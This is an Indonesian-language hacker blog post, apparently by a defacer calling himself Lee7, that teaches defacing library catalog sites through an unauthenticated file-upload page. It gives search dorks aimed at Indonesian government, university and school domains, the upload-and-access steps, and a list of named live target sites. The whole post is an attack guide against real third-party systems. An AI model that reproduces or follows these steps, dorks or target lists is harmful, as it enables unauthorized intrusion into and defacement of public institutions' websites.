Deface poc File Attachment Upload Respository+Live target

Kembali lagi dengan gua Lee7 tergans :v

Ok ok tutorial kali ini gua share materi

Tutorial Deface Poc File Attachment Upload Respository+Live target

Dork:
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
-inurl:/admin/modules/bibliography/pop_attach.php             
- exploit: /admin/modules/bibliography/pop_attach.php
Ekstensi: *.txt

Pertama buat file txt dulu :)

Kalo udah tinggal simpan dengan ekstensi txt
- terus kita pasang exploitnya contoh:
    http://pustaka.pa-boyolali.go.id/admin/modules/bibliography/pop_attach.php

- unggah file txt kalian yang barusan di buat. Ga ngerti? Hdeh mati aja luh bambank

- kalo udah tinggal panggil deh 😘
- kalo udah tinggal panggil file luh contoh:
   http://pustaka.pa-boyolali.go.id/repository/Leu.txt

Live target:
http://katalog.widyatama.ac.id

http://pustaka.pa-boyolali.go.id

http://lib-smpn2ponorogo.sch.id
http://elibrary.ikhac.ac.id
https://library.isi-padangpanjang.ac.id
http://digilib.polman-bandung.ac.id
http://perpus.stiq.ac.id

Bagikan Artikel ini